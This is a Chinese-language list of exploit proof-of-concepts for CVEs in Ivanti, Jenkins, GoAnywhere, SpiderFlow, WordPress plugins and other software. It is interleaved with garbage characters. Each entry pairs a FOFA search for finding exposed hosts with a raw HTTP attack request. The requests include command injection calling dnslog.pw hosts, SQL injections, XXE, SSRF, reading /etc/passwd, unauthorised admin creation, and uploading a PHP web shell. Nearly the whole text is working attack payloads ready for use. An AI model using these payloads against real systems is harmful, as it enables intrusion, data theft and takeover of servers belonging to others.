8 c$ b' i9 n7 C  CFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"& @  M& \+ J% Q  q3 x
GET /passport/login/ HTTP/1.1) e) d6 m$ B% `$ f. T9 s4 x$ w  s
Host: 192.168.40.130:80851 i$ R4 k6 N* U5 O0 @$ }! v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 a+ p; t$ ^. W( c7 W
Accept-Encoding: gzip
8 W% r& K# |$ I, l" l: VConnection: close
% S! x" Y: ~$ D! W. @Cookie: rememberMe=PAYLOAD# D4 R3 n* w0 e
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"" Y3 X5 P) C- u& Z/ d$ b7 y  l
4 Z# m9 b( m- k% P4 O

. Q- w( w' M" Y8 l$ r* a8 r98. SpiderFlow爬虫平台远程命令执行# S1 D4 S4 E% m7 [6 e
CVE-2024-0195; ]$ i0 _( k0 `
FOFA:app="SpiderFlow"$ a0 P$ q/ g; p& S
POST /function/save HTTP/1.10 @2 E4 U! F, b% G2 F9 V3 F
Host: 192.168.40.130:8088
6 b! J: ]- I0 K, `8 KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0! q! F& E( h' {3 _! Y' v! M
Connection: close
9 c9 S: H% C  |3 ^5 ?) K: i: c; UContent-Length: 121
/ _# X% A/ `" m7 {8 ]Accept: */*3 o' H2 a# ~8 d
Accept-Encoding: gzip, deflate
5 n  L/ U% Z5 r# V9 QAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, ~  h. b% U( d: pContent-Type: application/x-www-form-urlencoded; charset=UTF-8; W; K/ ]' t2 j7 ?) D
X-Requested-With: XMLHttpRequest8 Q! `7 ?  S$ f8 w$ x( C# [, l- ?2 ]$ }
# G8 C# _3 X; K
id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
( A8 {/ u8 H/ q, `6 M- r$ D
7 k% |$ N# C7 `1 k2 V
1 _9 f$ s" J4 v5 W/ m  i99. Ncast盈可视高清智能录播系统busiFacade RCE
% @9 o) b, ^. t' z% p& p/ F7 JCVE-2024-0305
9 A' k) B; G8 {8 m: nFOFA:app="Ncast-产品" && title=="高清智能录播系统"4 U. l4 H% [' x. T
POST /classes/common/busiFacade.php HTTP/1.1
3 _2 x- D: Q2 r) rHost: 192.168.40.130:8080/ j9 N7 r, Q6 C+ n8 w* G4 E$ i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0! T6 ]. [4 ~2 |  _- p; I
Connection: close+ t/ a3 C% [+ m3 n3 \3 }* n5 s
Content-Length: 154
6 C0 V, v6 g& M7 d; c2 _3 KAccept: */*
; P3 m% U, T2 V% cAccept-Encoding: gzip, deflate
; ~( m% d! G$ E4 C& n5 WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 ^3 D1 V9 H5 ^' l/ |! t' }Content-Type: application/x-www-form-urlencoded; charset=UTF-8' h3 E# A7 z2 J( j
X-Requested-With: XMLHttpRequest
5 Y  w: t9 O' L# r
8 i% G: ]2 a; k%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D; Y# q4 p1 ^! Q% U* ~
2 E- j$ s: b# M: \. d

" g2 k" ?# `) g* }2 c3 J3 \" m& C# z100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传2 f: y7 i9 n! ~) h4 A6 y
CVE-2024-03524 ^* K* d: t5 d9 e4 U( F
FOFA:icon_hash="874152924"9 W' D+ G' q- u. d+ }8 J" b
POST /api/file/formimage HTTP/1.1% G* k7 x' k5 h+ R  u, ]' c, F- g
Host: 192.168.40.130
9 }" e$ Z; n& L; t; O9 fUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.369 M+ f3 N9 B0 r1 D
Connection: close  }! U, m/ N. i3 A0 f5 t6 F* t
Content-Length: 201+ o- E8 v5 @- N
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
6 _9 }/ t, W  fAccept-Encoding: gzip$ n8 Q, Z- m* x

' K3 l) D) u5 N8 F% m2 y6 x------WebKitFormBoundarygcflwtei* _% `8 W$ M4 I$ w) ^, g
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
+ C; ^, [. y  ?: `3 @7 R4 i% i3 V0 uContent-Type: application/x-php- t5 h9 p- l8 ^  D
9 H! T: P4 M! `: h0 u  J
2ayyhRXiAsKXL8olvF5s4qqyI2O
* C4 U7 i! o# \$ n, v( l% R* I------WebKitFormBoundarygcflwtei--# u9 e( x: B" o

& b! _8 M3 I/ d6 {6 z7 G; _% B) t) ^& j8 W) r4 a
101. ivanti policy secure-22.6命令注入
: @/ y' V' n! w5 W3 d5 U# ?+ pCVE-2024-21887
  X" L0 P( u$ Z7 S( }: cFOFA:body="welcome.cgi?p=logo", S& [) }$ N# Z# w) z
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
1 k" L8 J+ X$ c- R' [Host: x.x.x.xx.x.x.x
* ^, G% R9 a4 m  B9 C1 VUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36/ x" L8 Z* ]- o% g; b
Connection: close9 p1 x5 c: c% r
Accept-Encoding: gzip/ V7 _1 z9 k' a5 I. S6 B) x$ o

" ~% n- |: M9 V! l. n7 n/ V0 z( [2 v; g
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
- O8 U" q3 {# |( Q2 xCVE-2024-21893
+ X9 M1 f. E( E0 i' kFOFA:body="welcome.cgi?p=logo"* m) r  b- w+ K5 n
POST /dana-ws/saml20.ws HTTP/1.1
  s3 _5 I: y, H. Q' S7 v5 L- ~Host: x.x.x.x
. G& A1 n2 S+ D: L! {% g+ CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36# j# j$ ]% @7 T# [& J) L( }
Connection: close
7 o: x9 F( A' M" EContent-Length: 792
+ W. ~6 e$ D( B* IAccept-Encoding: gzip* L; _- C7 w2 E
' o  M: H3 Q$ _8 S8 _! K, X; q, u
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>
: ]( E  S1 W' ?
" t2 J5 I4 i) w3 Y0 R$ n103. Ivanti Pulse Connect Secure VPN XXE5 p+ J- `" L# t$ G/ S
CVE-2024-22024, K4 I( N' e, r7 M' X
FOFA:body="welcome.cgi?p=logo"
& \7 I# s" y# D  A" F+ vPOST /dana-na/auth/saml-sso.cgi HTTP/1.13 d" D9 u  L5 u
Host: 192.168.40.130:111
& }" {/ I* Q. y: lUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
8 k" a; k" }+ s7 m0 r& KConnection: close/ J" |8 ^; C  t1 J
Content-Length: 204
8 p& N' B; z# J, _* V0 S1 XContent-Type: application/x-www-form-urlencoded6 ^; l1 A- F9 s/ ]6 {7 @
Accept-Encoding: gzip3 a" C" c3 l; X1 k1 p

- O7 e6 p2 H0 fSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==; [" ~  K3 ?3 M5 `& r7 M" q% D
& X- |6 S1 @3 ^: ~3 ?' F

- L# S6 K, b5 e5 }$ Q" I& k6 ~其中SAMLRequest的值是xml文件内容的base64值,xml文件如下! m5 S! P8 g: Y' I5 ?
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
! \- N4 A; H: h3 v. }3 B7 S- L3 F) y1 R
' o2 F  f3 i( p, X# p9 [( S! t& c1 C$ q$ M. N) R
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
  S0 n: @; l/ q$ i. UCVE-2024-0569. k+ U9 I8 b; M
FOFA:title="TOTOLINK"
( z* r6 l- B; V" b1 _POST /cgi-bin/cstecgi.cgi HTTP/1.1
( p1 `4 a; J/ F5 U! gHost:192.168.0.1
' Z5 f, e! W. H( _: qContent-Length:41
+ Y6 f4 f( w; O/ a4 l- t5 k  UAccept:application/json,text/javascript,*/*;q=0.01! i0 g4 V0 Y% m7 E  c
X-Requested-with: XMLHttpRequest$ x% H" ?5 l, X0 @+ B/ K% k
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.367 {; v# s# r6 Q) c. a
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
$ s; q5 n$ ~% K% DOrigin: http://192.168.0.1
! y% J  c, ?1 d8 r  G2 UReferer: http://192.168.0.1/advance/index.html?time=16711523805646 }: r  C8 h4 V2 v& ?; A8 P
Accept-Encoding:gzip,deflate7 R) n* D, P0 p- U  P" o, ~0 }4 T
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
7 G7 B) N8 }7 D7 p3 `9 ^Connection:close) h- d7 F+ x% B2 y+ K1 V" }7 z8 i- ~3 v

7 J: n: V) s  o" e4 ?6 _{- D# }& t) V- y% E$ }! L' y& `
"topicurl":"getSysStatusCfg",
9 C, z& F. V' O: ?2 D"token":""
. h8 ~( j/ T4 Q' a  V}
) Q( o- _4 ?& L5 \
5 a# D5 M% E% f8 {4 `) i; d105. SpringBlade v3.2.0 export-user SQL 注入* Z, ~2 v. |  B, \/ g
FOFA:body="https://bladex.vip"( e1 J: b. A* k0 I
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1" R; b6 Q1 ^7 }8 ~% m
) p& B3 Q7 M/ v# u4 \: ?8 [
106. SpringBlade dict-biz/list SQL 注入+ U  W% P7 t* a/ q, }, C
FOFA:body="Saber 将不能正常工作"4 W5 ^" M# {: F. _
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.12 ^0 p, p# j* t, q$ {
Host: your-ip
4 |9 e" S6 W" F" yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 X- g7 o+ {/ P4 l# g* }: }3 u0 }
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A! c3 I$ J: j, U% `" V) f
Accept-Encoding: gzip, deflate. c0 X* m3 o+ r; s# V5 s
Accept-Language: zh-CN,zh;q=0.9
1 @/ v) A% v5 y$ ZConnection: close
2 r! r% f" x# E0 F0 N* I3 K4 J  G$ a; n7 T8 ?! J- ]

9 |7 ~% L5 Y& d' A' b0 U107. SpringBlade tenant/list SQL 注入
- s" ]) f1 h+ NFOFA:body="https://bladex.vip"
+ V/ K1 [+ Q. _" y5 |) OGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
$ r% b6 ]+ _6 E# b2 `: hHost: your-ip  h3 a) C9 q; x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 N6 h( J7 d; B6 @' N, f
Blade-Auth:替换为自己的
6 \% u8 Q' v0 I5 WConnection: close
# N# G: [) u. }. x2 i, j# s2 X. p- z( O4 C

; v3 Z6 S) H& K4 @. f108. D-Tale 3.9.0 SSRF
2 ?- I8 R$ t; E' T( vCVE-2024-21642
, J  A! r+ W3 X% Z+ |; XFOFA:"dtale/static/images/favicon.png"
8 b$ s5 b+ n1 Y* x  |& bGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1! g1 @* C+ M5 x$ D7 ~5 [( P! j
Host: your-ip9 {3 j3 b. L1 N1 v$ L+ ^1 Z- H
Accept: application/json, text/plain, */*
4 C: K1 h. o' D4 S* Y6 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36% J" Y. _! U4 r
Accept-Encoding: gzip, deflate
6 b3 z6 f; L( aAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
( p  L$ G9 L2 H! {- aConnection: close; V! O. q0 U2 Z2 @/ h; I
' e8 c- }: {  H0 v9 j' \

" ]  T" {; h' A6 ]+ j109. Jenkins CLI 任意文件读取
, N' Z  [5 k2 o% q* C: v6 x- pCVE-2024-238974 m1 X$ |+ W4 v1 y0 X+ R2 i; W
FOFA:header="X-Jenkins"" x0 y5 k+ s& U) L" ?+ [: A
POST /cli?remoting=false HTTP/1.1& Z# J# D  s( a1 V9 E8 X6 s
Host:' Q6 B0 V. {- c' H* v1 v$ t
Content-type: application/octet-stream, d$ h  u5 m& ~- `1 D5 `5 Y% x# N% p
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
) f1 T. Z6 [" ?$ }Side: upload/ y  d, j" `8 M' {- h9 j
Connection: keep-alive: o# d6 E) ^- r. H, \8 e1 }
Content-Length: 163
$ c+ m! d' K& a" ]/ s) P% o% q0 W0 s% V3 [5 }
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'" C# V( L# [8 ^9 }$ v! K& |5 m

4 v% k$ }7 }& |$ f- y7 s  ]' K% U7 g& O+ [
POST /cli?remoting=false HTTP/1.1/ [! S- r3 d5 J2 z' E
Host:1 E6 o1 l# U6 y; U  H
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
+ i4 R2 P# A9 N; Q) ]; N: t. fdownload
4 y$ |$ R  t- L/ i/ ^Content-Type: application/x-www-form-urlencoded
* G; S+ X1 G9 {3 @, ]: m  kContent-Length: 0
4 P1 [$ E7 H0 J! O* G0 V1 N( w6 R. ?" d+ W, y
6 Q" Z$ Z2 ~! W: k$ y
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin) m/ g, S3 r2 y! C& i
java -jar jenkins-cli.jar help
  F9 A  i) p  |" K' j" P[COMMAND]$ v- U- V( W' V0 [
Lists all the available commands or a detailed description of single command.
# e( O" W3 I" \; G' ? COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)8 f' @* ?' a& U8 i% ~' d
1 S/ z0 w8 t9 H5 m) N' N) s% f6 _5 X6 o
: t+ J. |8 r2 c1 d
110. Goanywhere MFT 未授权创建管理员
5 u- Y. V6 u/ y9 V/ k6 ~CVE-2024-02047 ?3 S4 w! b/ f) ]0 B
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
# x" @/ [8 G$ `) R& P1 CGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
$ X' u  J- Y2 m+ `Host: 192.168.40.130:8000! d: F3 J- E' G( U  ]. S
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36/ s- k4 ~5 D: w# N- B
Connection: close
  K1 q4 [! E3 y7 r+ rAccept: */*
; u! H4 N7 e8 }" B4 Z' xAccept-Language: en! }: G2 V6 m5 F/ T0 s' c/ m: o
Accept-Encoding: gzip
, E9 j" t$ i8 A2 y, u- Q! s! a8 r1 n( o* Y7 s" _

# \9 B5 y0 D- O( V) Q. E$ b111. WordPress Plugin HTML5 Video Player SQL注入. S: T" [4 [$ c( r* L! \
CVE-2024-10613 C5 b( X0 D  h% [7 m, n  u) j4 _+ U
FOFA:"wordpress" && body="html5-video-player"
2 T! v( J( s$ \0 `6 Q$ \) YGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
; g3 y+ e* }& ]  @' [* DHost: 192.168.40.130:112
. i% y: S0 G+ g1 q3 {6 L1 eUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" G% z% X' `" O% U6 c" t8 P
Connection: close
' ?3 ^# z, C4 {3 n: q8 A* x5 JAccept: */*' V4 J/ _5 b: b' I4 q7 L  B. ?
Accept-Language: en
# y: y% h3 u7 R8 h3 B7 \Accept-Encoding: gzip
! y2 W7 @% I4 e, l! o4 Y0 d0 C! A! _$ J, Z
6 z) A7 l- o# y0 s. x6 P: i- W
112. WordPress Plugin NotificationX SQL 注入$ h0 P4 b! }; h: a- v) W
CVE-2024-16980 p( [1 G7 w' ~+ [) f' E
FOFA:body="/wp-content/plugins/notificationx"! k- b) B  s1 _' a: ^
POST /wp-json/notificationx/v1/analytics HTTP/1.1( x6 z% i* Q3 x- ]+ r0 I- C
Host: {{Hostname}}0 B1 j8 M4 G5 _* v  V
Content-Type: application/json
' C: l7 ?! `: e  d* @! E: U5 J9 {( T- I4 R7 y; L  `/ n8 S
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}. |" a6 }3 S4 P; C
7 j: F* S8 M5 D/ z0 \8 J6 d
& k6 A8 T+ S* ?
113. WordPress Automatic 插件任意文件下载和SSRF( `3 y: c& e/ A( J
CVE-2024-27954
4 x0 }) t1 p  }, s  {6 |- |9 B& ]  wFOFA:"/wp-content/plugins/wp-automatic"
8 T* l; b% e7 ^4 H5 L6 ~GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
" r# P! _% f/ ~Host: x.x.x.x4 E3 r% j5 {6 L
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
" O* O* j7 |8 K! @; u: A1 L! C* ZConnection: close$ K% U& }0 T7 z$ ^$ V7 u4 L
Accept: */*
) M5 p5 g! ~: v  UAccept-Language: en
# D, I! R/ @* K* p" c+ {! W' OAccept-Encoding: gzip! H) N8 G2 D  h& X$ }  ]7 [. ^: p) G
6 _- X3 n/ o* p/ l
2 o/ a% w# L/ [7 p2 d5 a" t
114. WordPress MasterStudy LMS插件 SQL注入. @, v, Z4 v! i( P, U: o* @7 T. n
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"& U6 l+ H- @4 [6 g
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.13 K% ]) a! g. R. J6 y0 h
Host: your-ip( ^! C6 h, n% u# v% s6 H1 t9 _
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36+ E  K: A6 J: {8 c" t5 u9 }4 q# @6 y
Accept-Charset: utf-8
, }5 Q2 K3 @; M7 P: D4 V0 |: `Accept-Encoding: gzip, deflate
$ [9 T, z# \; w$ g( HConnection: close
3 k( g! D+ A& M* c# g3 p) f1 G* @4 e3 S$ @1 u( T9 m' |

: \8 C, c0 U5 W! n! E7 H115. WordPress Bricks Builder <= 1.9.6 RCE
' v9 V) j9 p' U) `CVE-2024-256001 X8 E+ R! i, Z5 p! d
FOFA: body="/wp-content/themes/bricks/"
) O6 W1 Z- p" B, i' {3 L第一步,获取网站的nonce值
( a4 \9 b5 X5 ^; B: o2 T7 @GET / HTTP/1.1
9 v: I+ u9 s) D& BHost: x.x.x.x$ s8 q* m4 l& k9 X( k, u' D% W' w
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
4 q! m7 |6 F. I$ o" R1 s. HConnection: close8 J/ e. r" D7 g: y1 Q0 G  c
Accept-Encoding: gzip8 w. @  d$ F9 j) b  w3 f
5 R* g- h! \% Z3 t" ^3 z9 c

: [2 O) y8 J9 n& s3 g* }第二步替换nonce值,执行命令
! H; {, x6 Z# b. l0 z- Y! O, M( ]+ E# N5 CPOST /wp-json/bricks/v1/render_element HTTP/1.1
5 n" e# O/ m8 b! E9 i, }Host: x.x.x.x" o# s- [9 l' ^& R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
( v! U8 V- J& NConnection: close
6 a  h- G# n7 o  P: Y; A& A9 k* iContent-Length: 356
4 Z* r( z2 R, T, u; a5 m! \Content-Type: application/json/ d0 y% N( V  [5 o: z6 Y1 R
Accept-Encoding: gzip
) E2 A- H) c6 D2 J( c7 s! H$ s4 r# r; Y  R5 c
{
% ]% \- K" ^# F+ ]6 P( N"postId": "1",+ t/ F) B$ |9 \% u6 t' \! s
  "nonce": "第一步获得的值",
2 N0 g- N" Q' q& u: Q' ?( i  "element": {. [7 ^. N$ O/ `; D. l3 {
    "name": "container",
* W0 y$ n0 ~: ]8 [; B    "settings": {+ {! W7 ]: I) D  a4 w, J* d1 r
      "hasLoop": "true",
6 C# K5 y* y& e  a4 O' ^1 |      "query": {( x0 V5 [9 K2 Z% W
        "useQueryEditor": true," L. H! ~; n% g. W
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",  _' T2 l1 P8 J" w
        "objectType": "post"
! s2 l& b* r$ R# H' |4 E" ^- Q      }
3 D" @0 x7 g' b1 R( m    }
) K7 n. e# O) l$ Z  }
! C' v6 R4 X6 f* e/ s8 V}
& S4 O) {. U, f" R9 S- d1 P6 h* f; v' A0 q8 a' J5 X
% ^+ ?5 z  K5 i# t; C: t& i
116. wordpress js-support-ticket文件上传
; w3 y0 |! F. T5 \& L8 ]% B6 vFOFA:body="wp-content/plugins/js-support-ticket"- C! Y- f( a% S, _/ v* G
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
( X1 j$ z; C1 t' {Host:
1 B) E/ N  h& L' U$ q; TContent-Type: multipart/form-data; boundary=--------767099171
& M5 R3 }- S0 n( |9 ~6 f, SUser-Agent: Mozilla/5.0
- |) B& `7 W7 N. I7 {& f: B2 g2 W3 G$ Q7 i  o* l  r+ i
----------767099171
( p/ k. D7 T& W$ P  U! MContent-Disposition: form-data; name="action"0 Z8 S6 [2 ]* x9 G" Z- @& N1 w
configuration_saveconfiguration$ Y; L% g5 q* H& P" W3 x
----------767099171
+ d. w; u! h3 _; {Content-Disposition: form-data; name="form_request"
4 f) s  k1 l$ xjssupportticket: S5 y$ o% c; m5 Z* z0 W: j
----------767099171
4 n2 D, b1 b* h3 r5 zContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"% I  A( i5 }8 p. h# D9 S. e3 w
Content-Type: image/png
' M+ {, O9 S5 D  ~----------767099171--
2 V6 V- {+ L% b6 L7 q  x' Q, _* D$ o% Z2 `+ k4 n4 M" d" b8 n# j2 N
. Y+ K+ s" j. c8 [
117. WordPress LayerSlider插件SQL注入, J7 S) O  V  H; y  `- C$ S% l+ t
version:7.9.11 – 7.10.0
& ?- i7 f6 q) fFOFA:body="/wp-content/plugins/LayerSlider/"
0 n2 v( g, t! R& LGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.19 e4 I* R/ x: l
Host: your-ip
& x- M: ?  f% b3 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0+ Y  I" N- N4 [% p# \6 J6 e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 U  H! k- f$ P& b9 [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ Z0 V& u3 l" ^* O' G0 T
Accept-Encoding: gzip, deflate, br% P5 x$ y+ O1 l+ J! v& n
Connection: close
. M0 J: }' R! Z6 ]8 k/ x# Z, tUpgrade-Insecure-Requests: 1$ r. c  L8 j( [" W& b& b( \

3 s5 t( O( ^$ a2 r' M- e$ ~9 `3 d  Y2 E; D: {& L* p; X) h4 B
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传1 X2 e* F8 A5 L* A0 s: T
CVE-2024-0939
, f$ a+ g, i" z, y  HFOFA:title="Smart管理平台"" R1 f, H7 ~/ D. c" O$ U3 t3 h
POST /Tool/uploadfile.php? HTTP/1.1
" q! E% O2 w" vHost: 192.168.40.130:8443
, T3 @) D3 ]$ }$ `9 @* L6 lCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
' r6 a8 G% H  d5 T7 [" y2 r6 t1 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
0 e8 W5 T& f6 }0 M9 M9 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 D. @2 E4 X: G/ C5 ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 d% K" a1 I; S, W8 ^% ^
Accept-Encoding: gzip, deflate" [5 h% m1 L( f5 r
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887% C' \/ D1 ^) e, I# C
Content-Length: 4050 ~8 x6 G+ ]' s, x
Origin: https://192.168.40.130:8443
3 q: y5 ]8 B: s1 J. k# K$ n9 dReferer: https://192.168.40.130:8443/Tool/uploadfile.php
" R! a: e6 D" e" A4 Y5 m  YUpgrade-Insecure-Requests: 1
' U3 R: y4 M# Y- B  ]+ R4 b1 q- qSec-Fetch-Dest: document/ n$ a- |. |$ t$ A* _' f/ A
Sec-Fetch-Mode: navigate8 E- S5 m( y, d
Sec-Fetch-Site: same-origin& w& x3 N+ c& l- E- k. x" {
Sec-Fetch-User: ?1/ Y" y  ]4 B& y4 x% a
Te: trailers7 }& s5 h# w" r
Connection: close
: i8 x5 {5 F- t( u2 Y* C8 \7 V9 t4 R9 b* l
-----------------------------13979701222747646634037182887
7 ?6 l* _8 p6 G3 |3 Y: g5 \Content-Disposition: form-data; name="file_upload"; filename="contents.php") s2 a* A0 }- S4 x* u6 J- G; s4 `
Content-Type: application/octet-stream( G4 p4 q& o" i

; t: ?7 i' Y' Q& }<?php
* m. a" _7 W2 W  v- @5 a3 F+ m# asystem($_POST["passwd"]);
  p9 j1 _, ?/ _, r?>
+ G0 K1 n2 e8 ]4 w% |% l7 n; V3 [-----------------------------13979701222747646634037182887
4 `, \, b' @* I4 J+ t- kContent-Disposition: form-data; name="txt_path"
  e2 Z' q" s, l" g0 y# V. d
0 Q* A2 B- O+ P& d' ~, N( m. Y( O/home/src.php
